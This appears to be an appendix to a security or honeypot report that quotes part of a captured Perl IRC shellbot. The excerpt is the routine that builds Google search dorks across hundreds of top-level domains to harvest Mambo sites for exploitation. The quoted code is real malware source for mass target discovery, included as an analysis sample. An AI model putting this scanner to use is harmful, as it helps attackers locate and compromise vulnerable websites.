Appendix C - Sample code from a Perl bot

The following code is part of a shellbot which was captured by a honeypot. It is credited initially to atrix with spreading code by sirhot. When a command is issued to this bot via an IRC channel, it will reply 'Scanning for unpatched mambo ...'. It then performs a Google search, restricted to a random top-level domain, for the phrase "option=com_content" either in the body of the page or in the URL itself. Each host that is successfully exploited is reported via the IRC channel.

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $n= 80;
    if ($rnd<5000) { $n<<=1;}
    my $s= (int(rand(10)) * $n);
    my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
                "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
                "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
                "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
                "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
                "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
                "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
                "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",         
                "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
                "vu","vn","ye","yu","cd","zm","zw","");

    my @str;

    foreach $dom  (@dominios)

    {
        push (@str,"%22option=com_content%22+site%3A".$dom."%20",
          "inurl:%22".$dom."/index.php?option=com_content%22");
    }

    my $query="www.google.com/search?q=";

    $query.=$str[(rand(scalar(@str)))];

    $query.="&num=$n&start=$s";
    my @lst=();

    my $page = http_query($query);
    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){

        if ($1 !~ m/google|cache|translate/){

            push (@lst,$1);
        }
    }

    return (@lst);
}